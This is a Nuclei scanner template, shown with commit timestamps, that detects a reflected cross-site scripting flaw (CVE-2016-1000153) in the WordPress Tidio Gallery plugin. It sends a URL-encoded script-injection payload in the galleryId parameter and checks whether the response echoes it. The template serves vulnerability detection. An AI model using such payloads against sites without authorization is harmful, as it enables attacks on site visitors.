nuclei-templates/cves/2016/CVE-2016-1000153.yaml

36 lines
968 B
YAML
Raw Normal View History

2021-07-26 23:04:27 +00:00
id: CVE-2016-1000153
info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000153
cwe-id: CWE-79
description: "Reflected XSS in wordpress plugin tidio-gallery v1.1"
2021-07-26 23:04:27 +00:00
requests:
- method: GET
path:
2021-08-03 15:03:02 +00:00
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-26 23:04:27 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-08-03 15:03:02 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-26 23:04:27 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200